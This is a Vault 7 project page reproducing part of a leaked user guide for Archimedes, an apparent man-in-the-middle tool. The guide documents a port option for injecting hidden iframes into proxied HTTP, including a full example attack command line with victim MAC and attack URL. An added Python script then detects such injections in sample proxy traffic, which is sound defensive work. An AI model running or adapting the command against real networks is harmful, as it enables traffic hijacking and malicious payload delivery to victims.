Vault 7: Projects

This publication series is about specific projects related to the Vault 7 main publication.

SECRET//NOFORN
particularly vulnerable to reverse engineering and analysis. Debug versions of the tool should be used in
controlled test environments only.

(U) NEW OPTIONS

(S) PORT SPECIFICATION

(S//NF) The network port that will be monitored for HTTP traffic is an OPTIONAL parameter that can be specified
in either the configuration file or on the command line. It has a default value of the standard HTTP port 80. In the
configuration file it should be specified as:

PORT=8080

(S//NF) When provided as a command line option it must be the seventh argument (requiring that values are
provided for any previous optional arguments):

[VICTIM MAC] [HIJACK MAC] [MILLISECONDS] [URL] [VERIFY_ROUTE] [INJECTION_METHOD] [PORT]

Example:

> f32d.exe 00:0C:29:BD:34:45 00:0c:29:61:d0:d7 1000 http://10.0.0.11/attack.html FALSE HIDDEN_IFRAME 8080

Where “8080” is the port specification and all prior arguments are required.

PROXY INJECTION NOTES

The primary reason for adding the ability to specify the network port is to target HTTP connections that pass
through a proxy. Due to the method that Archimedes uses to capture targeted traffic, this will only work in
network configurations where the specified proxy is on a different subnet (i.e. traffic to the proxy must pass
through a gateway device).

(C) FIRE AND FORGET SUPPORT

(S//NF) Fire and Forget (v.2) support has been updated to include support for specifying the port as a command
line argument as described previously.

(U) APPLICATION DEFAULTS

(S//NF) The default value for the PORT configuration option is 80. This matches the original behavior of the tool.

(U) TROUBLESHOOTING

(S//NF) Archimedes and Fulcrum only inject into HTTP requests that reference the root of the document directory.
For example, http://www.test.com/ but not http://www.test.com/subdir/index.html. This continues to be true
when targeting proxied network connections.
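The two facts above (the PORT option exists to reach proxied HTTP, and injection only happens on requests for the document root) give a defender reviewing proxy traffic a precise profile to match. The following is an added example, not code from the guide or from the tool: it scans constructed request/response pairs assumed to have been captured at a proxy on port 8080 and reports hidden iframes whose host differs from the request Host, marking which ones also fit the documented root-path-on-configured-port profile. The tuple layout of an exchange and the sample traffic are assumptions; the iframe URL reuses the one from the guide's command-line example.

```python
import re
from typing import List, Optional, Tuple
from urllib.parse import urlparse

# Markers of a hidden iframe: zero size, or CSS that hides it (the HIDDEN_IFRAME method).
HIDDEN_IFRAME = re.compile(
    r'<iframe\b[^>]*?(?:width\s*=\s*["\']?0\b|height\s*=\s*["\']?0\b'
    r'|display\s*:\s*none|visibility\s*:\s*hidden)[^>]*>', re.IGNORECASE)
IFRAME_SRC = re.compile(r'src\s*=\s*["\']([^"\']+)["\']', re.IGNORECASE)

# An exchange is (port, method, request-target, Host header, response body); assumed layout.
Exchange = Tuple[int, str, str, str, str]

def is_root_request(target: str) -> bool:
    """True when the request is for the root of the document directory, the only case the
    guide says Archimedes/Fulcrum inject into. Proxied requests carry an absolute URL as the
    request-target, so reduce it to its path first."""
    path = urlparse(target).path if "://" in target else target
    return path in ("", "/")

def hidden_offhost_iframe(body: str, host: str) -> Optional[str]:
    """Return the src of a hidden iframe whose host differs from the request Host, else None."""
    for tag in HIDDEN_IFRAME.finditer(body):
        m = IFRAME_SRC.search(tag.group(0))
        src_host = urlparse(m.group(1)).hostname if m else None
        if src_host and src_host.lower() != host.lower():
            return m.group(1)
    return None

def flag_exchanges(exchanges: List[Exchange], port: int = 8080) -> List[Tuple[str, bool]]:
    """For each hidden off-host iframe return (src, matches_profile); matches_profile is True
    for a GET of the document root on the configured proxy port, the documented injection case."""
    hits = []
    for port_seen, method, target, host, body in exchanges:
        src = hidden_offhost_iframe(body, host)
        if src:
            hits.append((src, port_seen == port and method == "GET" and is_root_request(target)))
    return hits

# Constructed sample traffic (not a real capture). The first exchange matches the profile, the
# second is a subdirectory request, the third embeds a same-host iframe and is not reported.
SAMPLE: List[Exchange] = [
    (8080, "GET", "http://www.test.com/", "www.test.com",
     '<html><body><iframe src="http://10.0.0.11/attack.html" width="0" height="0"></iframe></body></html>'),
    (8080, "GET", "http://www.test.com/subdir/index.html", "www.test.com",
     '<html><iframe src="http://10.0.0.11/attack.html" style="display:none"></iframe></html>'),
    (8080, "GET", "http://www.test.com/", "www.test.com",
     '<html><iframe src="http://www.test.com/widget" style="display:none"></iframe></html>'),
]
```

Running `flag_exchanges(SAMPLE)` reports both off-host iframes, with only the root-path exchange marked as matching the profile; passing `port=80` instead marks neither, since the sample was captured on 8080.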
